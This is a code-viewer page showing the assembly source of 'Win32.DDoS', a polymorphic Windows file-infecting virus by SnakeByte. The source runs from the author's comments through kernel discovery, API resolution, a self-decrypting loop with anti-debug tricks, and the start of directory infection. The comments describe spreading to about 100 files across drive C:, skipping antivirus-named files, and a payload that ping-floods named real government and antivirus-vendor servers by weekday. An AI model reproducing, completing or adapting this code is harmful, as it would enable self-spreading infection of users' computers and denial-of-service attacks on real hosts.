📄 ddos.asm
字号:
;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
;
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
;
;
;
; This is the first Windows Virus I've written so far, and some parts are from
; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything
; was clear in my mind, as it is now, hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to keep track that they don't look completely useless.
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but i use several methods to put the values inside
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
;
; I was just able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
;
; It tries to get the 4 following API's:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
;
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Winsck32.dll <- Payload : Ping-flood a server
;
;
;
;
; What does this Virus do :
;
; - 1.st Generation infects just the current directory ( easier to infect just some files *eg* )
; - Get's API's with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
; - Infects the current, the windows and the system directory and parses some
; random directory's on drive C:
; - Follows LNK - Files ( does not work with NT / 2k )
; - Removes and restores File-Attributes
; - Parses Drive C:, enters a folder with a chance of 1 to 3
; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there )
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorph decryptor which will be used for all files infected in one run
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is a icmp flood on one of these servers :
;
; Sunday = www.bundesnachrichtendienst.de
; Monday = French Secret Service ( dgse.citeweb.net )
; Tuesday = www.avp.com ( AV )
; Wednesday = www.lockdown2000.com
; Thursday = www.f-secure.com
; Friday = www.norton.com
; Saturday = www.zonelabs.com
;
; *# Please note that i choose these servers because I think they can #*
; *# handle such an attack, if any idiot would release this into the wild. #*
;
;
;
;
;
;
; To make this code working use TASM 5.0 and pewrsec.
;
;
;
;
;
;
; Thanks and greetz fly to these people:
;
; Billy Beleceb - Your Win32 VWG is just great ..
; ( you'll find some of your code [Win32.Aztec] here ;)
; Evul - Thanks for hosting my site at coderz.net
; Ciatrix - Hope you carry on your good work with VDAT !
; SnakeMan - Hope you get more entrys *g* --> http://altavirus.cjb.net
; PhilippP - Thanks for the thrilling test in 2k .. ;)
; BumbleBee - Still thinking of Sex ?
; diediedie - Thnx for demotivating me... :)
; asmodeus - nice beginner lesson in poly ;)
; darkman - just believe me: the question was stupid ;)
;
;
;
;
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************
.586p
.model flat
jumps ; Jumps get calculated
; ( I know not good for optimizing.. )
.radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'
; 2 weeks until I found this bug.. :P
; some API's
extrn ExitProcess:PROC ; fake host for 1. Generation
extrn MessageBoxA:PROC ; For testing purposes ( no longer needed )
; but i needed it for error-detection *g*
; 'cause I am too stupid to work with softice.. :(
.data ; fake data for TASM
db ? ; otherwise TASM would not compile this
; we store all our data in the code
; section, that's why we need to use
; pewrsec after compiling, to set the
; code section flags to write !
; some constants I don't want to calculate on my own *g*
VirusSize equ (offset VirusEnd - offset Virus )
CryptSize equ (offset VirusEnd - offset CryptStart )
NoCrypt equ (offset CryptStart - offset Virus )
FirstLSize equ (offset VirusEnd - offset FirstLayerStart )
Buffersize equ (offset EndBufferData - offset VirusEnd )
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
.code
; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************
Virus: ; Here we go
call PDecrypt ; call the poly decryption routine
; which is located at the end of virus
; just a simple 'ret' in the first generation
FirstLayerStart: ; here starts the first layer
; everything will be crypted from here on
call Delta ; let's get the delta - offset
Delta:
mov ebp, offset Delta ; I want to do this a bit different
neg ebp ; than usual, who knows, maybe this
pop eax ; fools some bad heuristics
add ebp, eax
or ebp, ebp ; we don't need to decrypt the 1.
jz CryptStart ; Generation
; save esp
mov dword ptr [ebp+XESP], esp
mov ecx, (CryptSize / 2) ; the lenght of crypted part in words
mov dx, word ptr [ebp+Key]
lea esp, [ebp+CryptStart] ; set esp to the start of the decrypted part
DeCryptLoop: ; let's decrypt the virus
pop ax ; we pop the body word by word
inc dx ; this method fucks with debuggers, who
xchg dl, dh ; trace with int 1h ( destroys stack )
xchg al, ah
xor ax, dx
not ax
push ax
add esp, 2h
loop DeCryptLoop
; restore esp
mov esp, dword ptr [ebp+XESP]
jmp CryptStart ; start virus
Key dw 0h ; our key
XESP dd 0h ; we save the esp here
db 4 dup (90h) ; some nop's so we will not jump into a instruction
; ( happened sometimes during testing :( )
; because of the prefech queue buffer ( or whatever this is spelled .. )
CryptStart:
; we save these two values ( EIP & Imagebase )
; to be able to return to the original host..
mov eax, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], eax
mov eax, dword ptr [ebp+OldBase]
mov dword ptr [ebp+retBas], eax
mov eax, dword ptr fs:[0] ; save the original SEH
mov dword ptr [ebp+SEH_Save], eax
mov esi, [esp] ; let's get the return address of the Create Process API
xor si, si ; round it to a full page
push dword ptr [ebp+Error_ExecuteHost]
mov fs:[0], esp ; set new SEH
; call GetKernel ; try to get it
; jnc GetApis ; If got it we try to retrieve the API's
; Otherwise, we try to check for
; the kernel at some fixed addresses
; But the way above should work most
; of the times.. :)
mov esi, 077e60000h ; try the Win2k Kernel Addy
call GetKernel
jnc GetApis
mov esi, 0BFF70000h ; try the Win95 Kernel Addy
call GetKernel
jnc GetApis
mov esi, 077F00000h ; try the WinNT Kernel Addy
call GetKernel
jnc GetApis
mov esi, 077e00000h ; try the Win2k Kernel Addy
call GetKernel
jnc GetApis
; if we still did not found the
jmp Error_ExecuteHost ; kernel we stop the virus
; and execute the goat
; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************
; These are the 2 API's we search in the Kernel
; we need them to get all the others API's
; I prefer LoadLibraryA to GetModuleHandle,
; because it is no longer nessecairy, that the
; file we infect loads the dll files we need,
; we load them on our own,... ;)
; This means, we can use almost any API we want to *eg*
; LoadLibraryA also returns the Module-Handle, but
; if it is not loaded it loads it ... bla.. ;P
LL db 'LoadLibraryA', 0h ; we need these API's for searching..
GPA db 'GetProcAddress', 0h
GetApis: ; Offset of the Kernel32.dll PE-Header is in EAX
mov [ebp+KernelAddy], eax ; Save it
mov [ebp+MZAddy], ebx
lea edx, [ebp+LL] ; Points to name of the LoadLibaryA - API
mov ecx, 0Ch ; Lenght of Name
call SearchAPI1 ; search it..
mov [ebp+XLoadLibraryA], eax
; Save the Addy
xchg eax, ecx ; If we didn't get this API or the other one, we quit !
jecxz ExecuteHost ; thnx to Billy ;)
lea edx, [ebp+GPA] ; Points to name of the GetProcAddress - API
mov ecx, 0Eh ; Lenght of Name
call SearchAPI1
mov [ebp+XGetProcAddress], eax
; Save the Addy
xchg eax, ecx ; check if we failed
jecxz ExecuteHost ; ( thnx again, nice way of optimization *g* )
; Now we have our 2 nessecairy API's
jmp GetAPI2 ; and are able to get the others
; Yes I know this jmp is not very optimizing.. ;)
; But storing the data here helps me understanding
; my code *bg*
; this dll is delivered with every version
KERNEL32 db 'Kernel32',0 ; of windows, so we will get it always ( ..most likely *g* )
; the virus relies on it
IMAGEHLP db 'Imagehlp',0 ; this dll is not nessecairily needed, but dll's will
; only get infected, if we are able to use the CheckSumMappedFile
; Function from this dll to create a checksum
; it is delivered with win9x, NT and several compilers.
ADVAPI db 'advapi32',0 ; this dll is neccessairy to retrieve the startmenue folder
; from registry, so we are able to follow the shortcuts there
WSOCK db 'wsock32.dll',0
; we need this one here to perform a ping
; ( not needed for the virus, but the payload )
GetAPI2: ; We get them, by grabbing the handles of
; different DLL's first and use GetProcAddress
; to locate the API's itself
; Let's get the Handles by calling
; the LoadLibrary API.. :)
; if we fail to get the
; Kernel32, we execute the
; original host
lea eax, [ebp+KERNEL32]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+K32Handle], eax
test eax, eax
jz ExecuteHost
lea eax, [ebp+IMAGEHLP]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+IHLHandle], eax
lea eax, [ebp+ADVAPI]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+ADVHandle], eax
lea eax, [ebp+WSOCK]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+W32Handle], eax
lea esi, [ebp+Kernel32Names]
lea edi, [ebp+XFindFirstFileA]
mov ebx, [ebp+K32Handle]
push NumberOfKernel32APIS
pop ecx
call GetAPI3
lea esi, [ebp+ImageHLPNames]
lea edi, [ebp+XCheckSumMappedFile]
mov ebx, [ebp+IHLHandle]
xor ecx, ecx
inc ecx
call GetAPI3
lea esi, [ebp+ADVAPI32Names]
lea edi, [ebp+XRegOpenKeyExA]
mov ebx, [ebp+ADVHandle]
push 3d
pop ecx
call GetAPI3
lea esi, [ebp+WSOCK32Names]
lea edi, [ebp+Xsocket]
mov ebx, [ebp+W32Handle]
push 3d
pop ecx
call GetAPI3
; ***************************************************************************
; ------------------[ Outbreak ! Here we start infecting ]-------------------
; ***************************************************************************
; Now we got everything we need to
; start infecting some files *eg*
; First of all we retrieve the
; foldernames of the current folder,
; the system folder, and the windows folder
; these are the folders we start to infect
lea edi, [ebp+curdir]
push edi
push 7Fh
call dword ptr [ebp+XGetCurrentDirectoryA]
call genPoly ; before we infect anything, we
; create a poly decryptor used for
; all files we infect = slow poly !
mov [ebp+InfCounter], 10d ; Number of files we want to infect !
call InfectCurDir ; first of all we infect the current directory
or ebp, ebp ; if this is the first generation, we infect just
jz ExecuteHost ; the first directory ( makes it easier to infect
; just some files .. *g*
; we also don't start the payload !
push 7Fh ; buffer - size
; 7fh = 127d = max lenght of Directory name
lea edi, [ebp+windir] ; Pointer to the offset where we save the directory
push edi
call dword ptr [ebp+XGetWindowsDirectoryA]
lea edi, [ebp+windir] ; then we infect the windows directory
push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -